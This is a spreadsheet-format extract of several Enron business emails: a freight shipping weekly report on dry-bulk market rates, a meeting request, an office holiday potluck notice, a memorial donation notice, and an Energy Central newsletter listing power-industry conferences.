		 To: George McClellan/HOU/ECT@ECT, Stuart Staley/LON/ECT@ECT, Jeffrey A _x000D_
Shankman/HOU/ECT@ECT, Mike McConnell/HOU/ECT@ECT, Kevin _x000D_
McGowan/Corp/Enron@ENRON, Tom Mcquade/HOU/ECT@ECT_x000D_
		 cc: Peter Bradley/LON/ECT@ECT, Jez Peters/LON/ECT@ECT, Candace _x000D_
Parker/LON/ECT@ECT, Kenny Nicoll/LON/ECT@ECT, Dimitri Taylor/LON/ECT@ECT, _x000D_
Andy James/EU/Enron@Enron, Cornelia Luptowitsch/LON/ECT@ECT, Dorte _x000D_
Kjaergaard/LON/ECT@ECT, Fiona Ryan/LON/ECT@ECT, Jennifer Burns/HOU/ECT@ECT, _x000D_
Jeff Andrews/NA/Enron@Enron_x000D_
		 Subject: Freight weekly report_x000D_
_x000D_
_x000D_
Enron Shipping Services Weekly report 06/2001_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Highlight_x000D_
_x000D_
Cape market is bouncing back after having fallen for the best part of two _x000D_
months.  The bounce is expected to be gentle and not long lasting.  Owners _x000D_
are raising their rates for March cargoes as there appears to be a few more _x000D_
cargoes around mostly attributed to the fact that Japanese steel mills expect _x000D_
coal and Iron Ore prices for this year to increase and are therefore _x000D_
maximising their current contracts.  Furthermore, Bunkers have risen sharply _x000D_
over the last 10 days to over $130 in Rotterdam which was not expected by the _x000D_
market.  Of interest, Bocimar is redelivering ships it had taken on short _x000D_
period last year back to the head owner earlier than their contract allows _x000D_
for which has a few owners thinking about suing Bocimar for damages.  _x000D_
_x000D_
The panamax atlantic market has been falling hard over the last week with _x000D_
little grain movement from the US gulf and fresh Japanese concerns of GM _x000D_
crops imports from the US.  However, the Plate season is expected to start in _x000D_
March and market anticipates a return to healthy rates then.   The pacific is _x000D_
also falling from incredibly strong rates seen three weeks ago before the _x000D_
Chinese new year._x000D_
_x000D_
On the long term time charter with Mitsui, Mitsui has officially lifted their _x000D_
board of approval subjects and we are working through the internal _x000D_
documentation/proper sign off at this stage.  _x000D_
_x000D_
We have offered some competitive freight rates to the US steel group to _x000D_
import steel slabs from Turkey to US in the hope of providing the freight for _x000D_
this business when it happens.  Pierre is meeting with the pulp and paper _x000D_
guys while in Houston at the end of Feb and also going through NYC to meet up _x000D_
with the Enron metals shipping guy to discuss joint efforts in shipping to _x000D_
maximise synergy's and cost savings.  Furthermore, we are currently _x000D_
discussing with the US weather group the possibility of offering protection _x000D_
to ship owners for days lost at seas due to severe weather._x000D_
_x000D_
Market_x000D_
	Short term	Medium term	Long Term_x000D_
Handy Max	Down	Down	Down_x000D_
Panamax	Down	Flat	Down_x000D_
Cape Size	Up	Flat	Down_x000D_
_x000D_
Cape  (  Since last report 2 weeks ago )  _x000D_
Average time charter rate: $ 17,063 ( -1514 )_x000D_
Spot RBCT/Rotterdam: $ 8.25 ( -.54)_x000D_
Spot Tubaro/China: $9.95 (-1.10)_x000D_
Spot Bolivar/Rotterdam: $ 6.30 ( -.41)_x000D_
_x000D_
Panamax_x000D_
_x000D_
Average time charter rate: $ 11,500 ( -807 )_x000D_
Spot US Gulf/Japan: $21.60 ( - 0.57 )_x000D_
_x000D_
Deals Done_x000D_
Physical Freight_x000D_
ECS freight _x000D_
Fixed RBCT/Rotterdam with CC at $8.35_x000D_
Third parties freight deals_x000D_
In discusions with several charterers for cargo contracts_x000D_
OTC _x000D_
FFA s_x000D_
Numerous swaps on both the Cape and Panamax routes._x000D_
EOL_x000D_
Traded 150,000 tons with EDF_x000D_
_x000D_
Travels_x000D_
All three of us should be in _x000D_
_x000D_
_x000D_
Chris</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 11:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hi Wilson,_x000D_
_x000D_
Are you available for a conference call with David Hunt and me tomorrow?  _x000D_
Maybe something in the am?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 14 Dec 2000 01:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Getting into the Holiday Spirit!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/14/2000 _x000D_
09:53 AM ---------------------------_x000D_
_x000D_
_x000D_
Shirley Crenshaw_x000D_
12/14/2000 08:30 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Stinson Gibner/HOU/ECT@ECT, Pinnamaneni _x000D_
Krishnarao/HOU/ECT@ECT, Vasant Shanbhogue/HOU/ECT@ECT, Mike A _x000D_
Roberts/HOU/ECT@ECT, Joseph Hrgovcic/HOU/ECT@ECT, Tanya _x000D_
Tamarchenko/HOU/ECT@ECT, Zimin Lu/HOU/ECT@ECT, Martin Lin/HOU/ECT@ECT, _x000D_
Maureen Raymond/HOU/ECT@ECT, Osman Sezgen/HOU/EES@EES, Paulo _x000D_
Issler/HOU/ECT@ECT, Amitava Dhar/Corp/Enron@ENRON, Alex _x000D_
Huang/Corp/Enron@ENRON, Kevin Kindall/Corp/Enron@ENRON, Kevin G _x000D_
Moore/HOU/ECT@ECT, Clayton Vernon/Corp/Enron@ENRON, William _x000D_
Smith/Corp/Enron@ENRON, Jose Marquez/Corp/Enron@ENRON, Chonawee _x000D_
Supatgiat/Corp/Enron@Enron, Shalesh Ganjoo/HOU/ECT@ECT, Tom _x000D_
Halliburton/Corp/Enron@Enron, Elena Chilkina/Corp/Enron@Enron, Sevil _x000D_
Yaman/Corp/Enron@Enron, Sofya Tamarchenko/NA/Enron@Enron, Bob _x000D_
Lee/NA/Enron@Enron, Gwyn Koepke/NA/Enron@Enron, Hector Campos/HOU/ECT@ECT, _x000D_
Anita DuPont/NA/Enron@ENRON, Youyi Feng/NA/Enron@Enron, V Charles _x000D_
Weldon/HOU/ECT@ECT, Yana Kristal/Corp/Enron@ENRON, Praveen _x000D_
Mellacheruvu/HOU/EES@EES, Li Sun/NA/Enron@Enron, Stephen _x000D_
Bennett/NA/Enron@ENRON, Roman Zadorozhny/HOU/EES@EES, Lance _x000D_
Cunningham/NA/Enron@ENRON, Leann Walton/NA/Enron@ENRON, Shane _x000D_
Green/HOU/EES@EES, Seksan Kiatsupaibul/HOU/EES@EES, Kate Lucas/HOU/ECT@ECT, _x000D_
Nelson Neale/NA/Enron@Enron, Rabi De/NA/Enron@ENRON, Kenneth _x000D_
Parkhill/NA/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Getting into the Holiday Spirit!_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Good morning everyone:_x000D_
_x000D_
Several of us were talking and in order to help us get into the _x000D_
"Holiday Spirit" we thought it would be nice if each of us brought _x000D_
an appetizer, dessert, chips, popcorn, etc. or anything you desire, _x000D_
next Monday, the 18th.  We will put everything out in one of the _x000D_
conference rooms and celebrate ALL DAY!  Never mind about the _x000D_
calories - this is a once-a-year thing!  _x000D_
_x000D_
This is not mandatory - just if you want to and if you remember!_x000D_
_x000D_
Also, don't forget the "Holiday Party" at Damians on Tuesday night _x000D_
5:30 - 7:30 PM._x000D_
_x000D_
Have a great day!_x000D_
_x000D_
Shirley_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 07:23:54 -0800 (PST)</t>
  </si>
  <si>
    <t>Donations Honoring Cliff Baxter</t>
  </si>
  <si>
    <t>Many employees here at Enron knew Cliff Baxter well and were inspired by his spirit and his dedication to his family and to Enron.  For those of you who wish to honor Cliff, his family has requested that in lieu of flowers donations be made to:_x000D_
_x000D_
American Cancer Society_x000D_
6301 Richmond Ave._x000D_
Houston, Texas 77057_x000D_
1-800-227-2345_x000D_
_x000D_
or, _x000D_
_x000D_
Junior Achievement_x000D_
2115 East Governor's Circle_x000D_
Houston, TX 77092_x000D_
(713) 682-4500_x000D_
_x000D_
Services for Cliff will held in his hometown and will be private.</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 14:58:55 -0800 (PST)</t>
  </si>
  <si>
    <t>Energy Central Conference Watch - 2/1/02</t>
  </si>
  <si>
    <t xml:space="preserve">____________________________________________________________________________x000D_
_x000D_
ENERGY CENTRAL CONFERENCE WATCH_x000D_
  Covering Trade Shows, Conferences and Seminars for the Power Industry_x000D_
WEEK ENDING February 01, 2002_x000D_
____________________________________________________________________________x000D_
  _x000D_
  ----------------------------------------------------------_x000D_
  Online Registration Available! _x000D_
  Look for the events labeled "Online Registration Available!". _x000D_
  TO REGISTER INSTANTLY. "Special Offer!" means a special_x000D_
  discounted price for Energy Central Members!_x000D_
_x000D_
  Links are provided under selected events._x000D_
  ---------------------------------------------------------- _x000D_
_x000D_
  This update is a FREE supplement to the Energy Central_x000D_
  Daily Electric Power News Service. It is delivered each_x000D_
  Friday and includes New Listings, Upcoming Events, and_x000D_
  Featured Listings._x000D_
  ----------------------------------------------------------_x000D_
  To receive this service in HTML format, go to _x000D_
  http://www.energycentral.com/sections/services/_x000D_
  ----------------------------------------------------------_x000D_
  You MAY redistribute this message to others (via e-mail, print, _x000D_
  Intranet or other methods), as long as the entire message is kept _x000D_
  intact._x000D_
_x000D_
  For more information on the Daily Energy Central Electric Power _x000D_
  News Service, send a message to newstrial@energycentral.com or type _x000D_
  an 'x' in the brackets below and send this message back to_x000D_
  conferences@mail.energycentral.com._x000D_
_x000D_
  Energy Central maintains a comprehensive database of upcoming _x000D_
  conferences, seminars and trade shows related to the electric power_x000D_
  industry. You can access this database at _x000D_
  http://www.energycentral.com/sections/events_x000D_
_x000D_
  You may request more information on any listing in this message _x000D_
  simply by typing an 'x' between the brackets next to the listing and_x000D_
  sending the message back to conferences@mail.energycentral.com. _x000D_
  For more information on requesting information, or un-subscribing_x000D_
  to the Energy Central News Service, see the end of this message._x000D_
_x000D_
  [ ] 17-105: Request information on Energy Central Daily News Service_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  CONFERENCE ANNOUCEMENTS_x000D_
____________________________________________________________________________x000D_
_x000D_
  Contact sales@energycentral.com or (303) 782-5510 for information_x000D_
  on FEATURING your event in this space.  Your conference, seminar_x000D_
  or trade show listing can reach over 30,000 electric power_x000D_
  professionals next week!_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  FEATURED LISTINGS_x000D_
____________________________________________________________________________x000D_
_x000D_
FUEL CELL DYNAMICS 2002: REALITY, NOT HYPE_x000D_
  2/6/02 to 2/7/02 - New York, NY USA_x000D_
  [ ] 27-6930: Request more information on this listing_x000D_
  http://www.alliedworld.com_x000D_
  ONLINE REGISTRATION AVAILABLE!_x000D_
  http://www.energycentral.com/go_event.cfm?id=6930 TO REGISTER ONLINE!_x000D_
_x000D_
2002 GAS STORAGE CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Houston, TX USA_x000D_
  [ ] 27-7260: Request more information on this listing_x000D_
  http://www.ziffenergyconferences.com_x000D_
_x000D_
CERAWEEK 2002 - THE NEW FACE OF RISK: ENERGY STRATEGIES FOR A CHANGED WORLD_x000D_
  2/11/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7462: Request more information on this listing_x000D_
  http://www.cera.com/ceraweek_x000D_
_x000D_
4TH ANNUAL ELECTRIC ASSET VALUATION_x000D_
  2/25/02 to 2/26/02 - Houston, TX USA_x000D_
  [ ] 27-7257: Request more information on this listing_x000D_
  http://www.cbinet.com/_x000D_
_x000D_
DISTRIBUTECH 2002_x000D_
  2/27/02 to 3/1/02 - Miami Beach, FL USA_x000D_
  [ ] 27-7361: Request more information on this listing_x000D_
  http://www.distributech.com_x000D_
_x000D_
THE RATEMAKING PROCESS_x000D_
  2/27/02 to 3/1/02 - Atlanta, GA USA_x000D_
  [ ] 27-7537: Request more information on this listing_x000D_
  http://www.southerngas.org/calendarinfo.cfm?cid=154_x000D_
_x000D_
GLOBE 2002 INTERNATIONAL CONFERENCE &amp; TRADE FAIR ON BUSINESS AND THE ENVIRONMENT_x000D_
  3/13/02 to 3/15/02 - Vancouver, BC Canada_x000D_
  [ ] 27-5833: Request more information on this listing_x000D_
  http://www.globe.ca_x000D_
  ONLINE REGISTRATION AVAILABLE!_x000D_
  http://www.energycentral.com/go_event.cfm?id=5833 TO REGISTER ONLINE!_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  NEW LISTINGS_x000D_
____________________________________________________________________________x000D_
_x000D_
NEW AND EMERGING TECHNOLOGY CONFERENCE AND EXPO_x000D_
  2/20/02 to 2/22/02 - Tucson, AZ USA_x000D_
  [ ] 27-7583: Request more information on this listing_x000D_
_x000D_
KEYS TO ENERGY MANAGEMENT_x000D_
  2/21/02 to 2/22/02 - Anaheim, CA USA_x000D_
  [ ] 27-7593: Request more information on this listing_x000D_
_x000D_
TURBINE POWER SYSTEMS CONFERENCE AND CONDITION MONITORING WORKSHOP_x000D_
  2/25/02 to 2/27/02 - Galveston, TX USA_x000D_
  [ ] 27-7580: Request more information on this listing_x000D_
_x000D_
DISTRIBUTED GENERATION_x000D_
  3/7/02 to 3/8/02 - San Francisco, CA USA_x000D_
  [ ] 27-7590: Request more information on this listing_x000D_
_x000D_
INTERNATIONAL CONFERENCE ON ADVANCES IN LIFE ASSESSMENT AND OPTIMIZATION OF FOSSIL POWER PLANTS_x000D_
  3/11/02 to 3/13/02 - Orlando, FL USA_x000D_
  [ ] 27-7586: Request more information on this listing_x000D_
_x000D_
NATURAL GAS BASIC TRAINING_x000D_
  3/12/02 to 3/12/02 - Houston, TX USA_x000D_
  [ ] 27-7596: Request more information on this listing_x000D_
_x000D_
ELECTRICITY BASIC TRAINING_x000D_
  3/13/02 to 3/13/02 - Houston, TX 77032_x000D_
  [ ] 27-7595: Request more information on this listing_x000D_
_x000D_
RISK MANAGEMENT BASIC TRAINING_x000D_
  3/14/02 to 3/14/02 - Houston, TX USA_x000D_
  [ ] 27-7597: Request more information on this listing_x000D_
_x000D_
ADVANCED POWER TRADING_x000D_
  3/15/02 to 3/15/02 - Houston, TX USA_x000D_
  [ ] 27-7598: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF  COGENERATION &amp; ON-SITE GENERATION (CCP CERTIFICATION)_x000D_
  3/25/02 to 3/26/02 - Philadelphia, PA USA_x000D_
  [ ] 27-7591: Request more information on this listing_x000D_
_x000D_
THE 13TH ANNUAL CONFERENCE ON CLIMATE CHANGE AND OZONE PROTECTION_x000D_
  3/25/02 to 3/27/02 - Washington, DC USA_x000D_
  [ ] 27-7585: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF POWER QUALITY (CPQ CERTIFICATION)_x000D_
  3/25/02 to 3/27/02 - Philadelphia, PA USA_x000D_
  [ ] 27-7592: Request more information on this listing_x000D_
_x000D_
THE FUNDAMENTALS OF POWER ELECTRONICS - THREE-PART SEMINAR SERIES_x000D_
  3/26/02 to 3/27/02 - Washington, DC USA_x000D_
  [ ] 27-7577: Request more information on this listing_x000D_
_x000D_
PREDICTIVE SUBSTATION MAINTENANCE_x000D_
  4/2/02 to 4/4/02 - Madison, WI USA_x000D_
  [ ] 27-7581: Request more information on this listing_x000D_
_x000D_
THE ELECTRICITY BUYERS' FORUM_x000D_
  4/10/02 to 4/11/02 - St. Louis, MO USA_x000D_
  [ ] 27-7575: Request more information on this listing_x000D_
_x000D_
THE FUNDAMENTALS OF POWER ELECTRONICS - THREE PART SEMINAR SERIES_x000D_
  5/1/02 to 5/2/02 - Washington, DC USA_x000D_
  [ ] 27-7578: Request more information on this listing_x000D_
_x000D_
THE FUNDAMENTALS OF POWER ELECTRONICS - THREE PART SERIES_x000D_
  6/4/02 to 6/5/02 - Washington, DC USA_x000D_
  [ ] 27-7579: Request more information on this listing_x000D_
_x000D_
SKILLS UPDATE 2002 FOR CERTIFIED ENERGY MANAGERS_x000D_
  6/4/02 to 6/5/02 - Anaheim, CA USA_x000D_
  [ ] 27-7594: Request more information on this listing_x000D_
_x000D_
BUSINESS STRATEGIES AND NEW ENERGY TECHNOLOGIES_x000D_
  6/6/02 to 6/6/02 - New York City, NY USA_x000D_
  [ ] 27-7576: Request more information on this listing_x000D_
_x000D_
SOLAR 2002: ASES NATIONAL SOLAR CONFERENCE_x000D_
  6/15/02 to 6/19/02 - Reno, NV USA_x000D_
  [ ] 27-7588: Request more information on this listing_x000D_
_x000D_
FUEL CELL 2002_x000D_
  7/1/02 to 7/5/02 - Lucerne,  Switzerland_x000D_
  [ ] 27-7589: Request more information on this listing_x000D_
_x000D_
POWER-GEN INTERNATIONAL_x000D_
  12/10/02 to 12/12/02 - Orlando, FL USA_x000D_
  [ ] 27-7582: Request more information on this listing_x000D_
_x000D_
_x000D_
____________________________________________________________________________x000D_
_x000D_
  UPCOMING EVENTS - NEXT TWO WEEKS_x000D_
____________________________________________________________________________x000D_
_x000D_
CLEANER COAL TECHNOLOGY AND ITS COMMERCIAL IMPLEMENTATION_x000D_
  2/4/02 to 2/5/02 - London,  England_x000D_
  [ ] 27-7372: Request more information on this listing_x000D_
_x000D_
INTERNATIONAL COLLOQUIUM ON ENVIRONMENTALLY-PREFERRED ADVANCED POWER GENERATION_x000D_
  2/4/02 to 2/7/02 - Newport Beach, CA USA_x000D_
  [ ] 27-7431: Request more information on this listing_x000D_
_x000D_
THE ADVANCED PROJECT FINANCE COURSES_x000D_
  2/4/02 to 2/6/02 - Houston, TX USA_x000D_
  [ ] 27-7276: Request more information on this listing_x000D_
_x000D_
GROUNDING OF ELECTRICAL DISTRIBUTION SYSTEMS_x000D_
  2/4/02 to 2/6/02 - Orlando, FL USA_x000D_
  [ ] 27-7283: Request more information on this listing_x000D_
_x000D_
BUSINESS CONTINUITY &amp; DISASTER RECOVERY PLANNING_x000D_
  2/5/02 to 2/6/02 - New York, NY USA_x000D_
  [ ] 27-7446: Request more information on this listing_x000D_
_x000D_
SCADA FOR PETROLEUM, OIL &amp; GAS, AND WATER SECTORS_x000D_
  2/5/02 to 2/6/02 - Singapore, Si Singapore_x000D_
  [ ] 27-7529: Request more information on this listing_x000D_
_x000D_
GLOBAL EXPERTISE 02 - ENERGY MARKETING CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Vaasa,  Finland_x000D_
  [ ] 27-7375: Request more information on this listing_x000D_
_x000D_
FUEL CELL DYNAMICS 2002: REALITY, NOT HYPE_x000D_
  2/6/02 to 2/7/02 - New York, NY USA_x000D_
  [ ] 27-6930: Request more information on this listing_x000D_
  http://www.alliedworld.com_x000D_
  ONLINE REGISTRATION AVAILABLE!_x000D_
  http://www.energycentral.com/go_event.cfm?id=6930 TO REGISTER ONLINE!_x000D_
_x000D_
FUNDAMENTALS OF BUYING AND SELLING ENERGY_x000D_
  2/6/02 to 2/8/02 - San Francisco, CA USA_x000D_
  [ ] 27-7288: Request more information on this listing_x000D_
_x000D_
ANNUAL WORLD CONFERENCE_x000D_
  2/6/02 to 2/8/02 - New Orleans, LA USA_x000D_
  [ ] 27-7312: Request more information on this listing_x000D_
_x000D_
2002 GAS STORAGE CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Houston, TX USA_x000D_
  [ ] 27-7260: Request more information on this listing_x000D_
  http://www.ziffenergyconferences.com_x000D_
_x000D_
TRANSMISSION EXPANSION AND SYSTEMS IN TRANSITION CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Miami, FL USA_x000D_
  [ ] 27-7322: Request more information on this listing_x000D_
_x000D_
EFFECTIVE CHEMICAL PROCUREMENT STRATEGIES 2002 CONFERENCE_x000D_
  2/6/02 to 2/7/02 - Singapore, Sh Singapore_x000D_
  [ ] 27-7530: Request more information on this listing_x000D_
_x000D_
THE ADVANCED PROJECT FINANCE COURSES_x000D_
  2/7/02 to 2/8/02 - Houston, TX USA_x000D_
  [ ] 27-7277: Request more information on this listing_x000D_
_x000D_
NATURAL GAS - 101 SEMINAR_x000D_
  2/7/02 to 2/8/02 - Houston, TX USA_x000D_
  [ ] 27-7470: Request more information on this listing_x000D_
_x000D_
CRYSTALLIZATION OPERATIONS_x000D_
  2/7/02 to 2/8/02 - New Port Beach, CA USA_x000D_
  [ ] 27-7524: Request more information on this listing_x000D_
_x000D_
NARUC WINTER COMMITTEE MEETINGS_x000D_
  2/10/02 to 2/13/02 - Washington, DC USA_x000D_
  [ ] 27-7437: Request more information on this listing_x000D_
_x000D_
WINTER CONFERENCE 2002:  TECHNOLOGIES FOR EMERGING ENERGY POLICIES - MEETING ENERGY DEMANDS WITH SECURE, ENVIRONMENTALLY FRIENDLY TECHNOLOGIES_x000D_
  2/11/02 to 2/12/02 - San Francisco, CA USA_x000D_
  [ ] 27-7377: Request more information on this listing_x000D_
_x000D_
THE COMMERCIAL OPPORTUNITIES IN THE GENERATION OF POWER FROM NUCLEAR ENERGY: COMMERCIAL VIABILITY DRIVING INVESTMENT_x000D_
  2/11/02 to 2/12/02 - Rome,  Italy_x000D_
  [ ] 27-7300: Request more information on this listing_x000D_
_x000D_
COMPREHENSIVE 5-DAY TRAINING PROGRAM FOR ENERGY MANAGERS_x000D_
  2/11/02 to 2/15/02 - Miami Beach, FL  USA_x000D_
  [ ] 27-7310: Request more information on this listing_x000D_
_x000D_
THE ELECTRIC WEST SHOW_x000D_
_x000D_
  2/11/02 to 2/13/02 - Las Vegas_x000D_
, NV USA_x000D_
_x000D_
  [ ] 27-7132: Request more information on this listing_x000D_
_x000D_
CERAWEEK 2002 - THE NEW FACE OF RISK: ENERGY STRATEGIES FOR A CHANGED WORLD_x000D_
  2/11/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7462: Request more information on this listing_x000D_
  http://www.cera.com/ceraweek_x000D_
_x000D_
FUNDAMENTALS OF ENERGY FUTURES, OPTIONS &amp; DERIVATIVES_x000D_
  2/12/02 to 2/13/02 - Houston, TX USA_x000D_
  [ ] 27-7398: Request more information on this listing_x000D_
_x000D_
BASICS OF INDUSTRIAL ELECTRICITY_x000D_
  2/12/02 to 2/14/02 - Atlanta, GA USA_x000D_
  [ ] 27-7442: Request more information on this listing_x000D_
_x000D_
BUSINESS CONTINUITY &amp; DISASTER RECOVERY PLANNING_x000D_
  2/12/02 to 2/13/02 - Chicago, IL USA_x000D_
  [ ] 27-7447: Request more information on this listing_x000D_
_x000D_
HIGH VOLTAGE ELECTRICAL SAFETY OSHA REQUIREMENT 29 CFR 1910.269_x000D_
  2/13/02 to 2/14/02 - San Antonio, TX USA_x000D_
  [ ] 27-7459: Request more information on this listing_x000D_
_x000D_
GAS PROCESSING CONTRACTS &amp; NEGOTIATIONS_x000D_
  2/13/02 to 2/14/02 - Dallas, TX USA_x000D_
  [ ] 27-7503: Request more information on this listing_x000D_
_x000D_
MATERIALS MANAGEMENT/SUPPLIER CONFERENCE_x000D_
  2/13/02 to 2/15/02 - Albuquerque, NM USA_x000D_
  [ ] 27-7539: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF THE ELECTRIC POWER INDUSTRY_x000D_
  2/14/02 to 2/14/02 - Houston, TX USA_x000D_
  [ ] 27-7402: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF STATISTICAL ANALYSIS_x000D_
  2/14/02 to 2/14/02 - Houston, TX USA_x000D_
  [ ] 27-7410: Request more information on this listing_x000D_
_x000D_
FERC-DOE DEMAND RESPONSE CONFERENCE_x000D_
  2/14/02 to 2/14/02 - Washington, D.C.,_x000D_
  [ ] 27-7485: Request more information on this listing_x000D_
_x000D_
GAS-TO-ELECTRICITY ARBITRAGE &amp; MAXIMIZING THE PROFITABILITY OF ELECTRIC GENERATION_x000D_
  2/15/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7405: Request more information on this listing_x000D_
_x000D_
HOW TO VALUE ELECTRIC GENERATION ASSETS USING REAL OPTIONS_x000D_
  2/15/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7413: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF VALUE-AT-RISK_x000D_
  2/15/02 to 2/15/02 - Houston, TX USA_x000D_
  [ ] 27-7416: Request more information on this listing_x000D_
_x000D_
FUNDAMENTALS OF MONTHLY AND LONG-TERM FORECASTING_x000D_
  2/18/02 to 2/19/02 - Orlando, FL USA_x000D_
  [ ] 27-7364: Request more information on this listing_x000D_
_x000D_
DEVELOPING EFFECTIVE RISK MANAGEMENT POLICIES &amp; PROCEDURES_x000D_
  2/19/02 to 2/19/02 - Houston, TX USA_x000D_
  [ ] 27-7408: Request more information on this listing_x000D_
_x000D_
ENERGY, WEATHER AND EMISSIONS TRADING UNDER ONE ROOF_x000D_
  2/19/02 to 2/21/02 - Amsterdam,  The Netherlands_x000D_
  [ ] 27-7443: Request more information on this listing_x000D_
_x000D_
NEW NUCLEAR POWER PLANT TECHNOLOGY_x000D_
  2/19/02 to 2/22/02 - New Orleans, LA USA_x000D_
  [ ] 27-7533: Request more information on this listing_x000D_
_x000D_
EEO EUROPE: ENERGY TRADING IN THE NEW ECONOMY_x000D_
  2/19/02 to 2/21/02 - Amsterdam,_x000D_
  [ ] 27-7552: Request more information on this listing_x000D_
_x000D_
BUSINESS CONTINUITY &amp; DISASTER RECOVERY PLANNING_x000D_
  2/19/02 to 2/20/02 - San Francisco, CA USA_x000D_
  [ ] 27-7448: Request more information on this listing_x000D_
_x000D_
USING THE GSM DIGITAL WIRELESS INTERFACE_x000D_
  2/19/02 to 2/22/02 - Madison, WI USA_x000D_
  [ ] 27-7452: Request more information on this listing_x000D_
_x000D_
BASIS TRADING WITH NATURAL GAS FUTURES &amp; OPTIONS_x000D_
  2/19/02 to 2/20/02 - Houston, TX USA_x000D_
  [ ] 27-7493: Request more information on this listing_x000D_
_x000D_
DISTRIBUTED GENERATION TECHNOLOGY SEMINAR_x000D_
  2/19/02 to 2/20/02 - Tukwila, WA USA_x000D_
  [ ] 27-7538: Request more information on this listing_x000D_
_x000D_
GROWING GREEN POWER DEMAND; TOOLS, TACTICS AND METRICS FOR ACCELERATING SALES_x000D_
  2/20/02 to 2/21/02 - Denver, CO USA_x000D_
  [ ] 27-7461: Request more information on this listing_x000D_
_x000D_
MANAGING THE RISKS OF RETAIL OPERATIONS_x000D_
  2/20/02 to 2/22/02 - San Diego, CA USA_x000D_
  [ ] 27-7270: Request more information on this listing_x000D_
_x000D_
DESIGNING ELECTRICAL OVERHEAD DISTRIBUTION LINES_x000D_
  2/20/02 to 2/22/02 - Madison, WI USA_x000D_
  [ ] 27-7352: Request more information on this listing_x000D_
_x000D_
ENERGY &amp; ENVIRONMENTAL SUMMIT 2002_x000D_
  2/21/02 to 2/22/02 - San Diego, CA USA_x000D_
  [ ] 27-7371: Request more information on this listing_x000D_
_x000D_
RUSSIAN GAS FORUM_x000D_
  2/21/02 to 2/22/02 - Moscow,  Russia_x000D_
  [ ] 27-7444: Request more information on this listing_x000D_
_x000D_
FASB - 133 (FINANCIAL ACCOUNTING STANDARDS BOARD)_x000D_
  2/21/02 to 2/21/02 - Houston, TX USA_x000D_
  [ ] 27-7499: Request more information on this listing_x000D_
_x000D_
2ND ANNUAL MANAGING NATURAL GAS PRICE VOLATILITY_x000D_
  2/25/02 to 2/26/02 - Calgary, AB Canada_x000D_
  [ ] 27-7374: Request more information on this listing_x000D_
_x000D_
APPA 2002 WINTER INSTITUTE_x000D_
  2/25/02 to 3/1/02 - San Francisco, CA USA_x000D_
  [ ] 27-7445: Request more information on this listing_x000D_
_x000D_
2ND ANNUAL ELECTRIC DISTRIBUTION RELIABILITY CONFERENCE_x000D_
  2/25/02 to 2/26/02 - Miami Beach, FL USA_x000D_
  [ ] 27-7282: Request more information on this listing_x000D_
_x000D_
4TH ANNUAL ELECTRIC ASSET VALUATION_x000D_
  2/25/02 to 2/26/02 - Houston, TX USA_x000D_
  [ ] 27-7257: Request more information on this listing_x000D_
  http://www.cbinet.com/_x000D_
_x000D_
THE 2ND ANNUAL ELECTRICITY PRICE FORECAST CONFERENCE_x000D_
  2/25/02 to 2/26/02 - Sydney, NS Australia_x000D_
  [ ] 27-7259: Request more information on this listing_x000D_
_x000D_
VALUE &amp; RISK IN ENERGY MARKETS, INTRODUCTION TO PRINCIPLES AND METHODS_x000D_
  2/25/02 to 2/27/02 - Miami Beach, FL USA_x000D_
  [ ] 27-7482: Request more information on this listing_x000D_
_x000D_
RISK-BASED INSPECTION &amp; DAMAGE MECHANISMS IN GAS PROCESSING/OIL REFINERY OPERATIONS_x000D_
  2/25/02 to 2/26/02 - Singapore, Si Singapore_x000D_
  [ ] 27-7527: Request more information on this listing_x000D_
_x000D_
3RD ANNUAL MULTIPHASE AND WET GAS FORUM_x000D_
  2/25/02 to 2/26/02 - Houston, TX USA_x000D_
  [ ] 27-7568: Request more information on this listing_x000D_
_x000D_
ENERGY SECURITY: SAFEGUARDING OUR NATION?S POWER_x000D_
  2/26/02 to 2/27/02 - Arlington, VA USA_x000D_
  [ ] 27-7390: Request more information on this listing_x000D_
_x000D_
6TH ANNUAL OHIO ENERGY DEREGULATION CONFERECE &amp; EXPO_x000D_
  2/26/02 to 2/27/02 - Columbus, OH USA_x000D_
  [ ] 27-7145: Request more information on this listing_x000D_
_x000D_
THE TEXAS RETAIL SUMMIT_x000D_
  2/26/02 to 2/27/02 - Austin, TX USA_x000D_
  [ ] 27-7349: Request more information on this listing_x000D_
_x000D_
2ND ANNUAL MANAGING ELECTRICITY PRICE VOLATILITY_x000D_
  2/27/02 to 2/28/02 - Calgary, AB Canada_x000D_
  [ ] 27-7373: Request more information on this listing_x000D_
_x000D_
THE INAUGURAL AUSTRALASIAN GAS TO LIQUIDS FORUM_x000D_
  2/27/02 to 2/28/02 - Perth, WA Australia_x000D_
  [ ] 27-7258: Request more information on this listing_x000D_
_x000D_
DISTRIBUTECH 2002_x000D_
  2/27/02 to 3/1/02 - Miami Beach, FL USA_x000D_
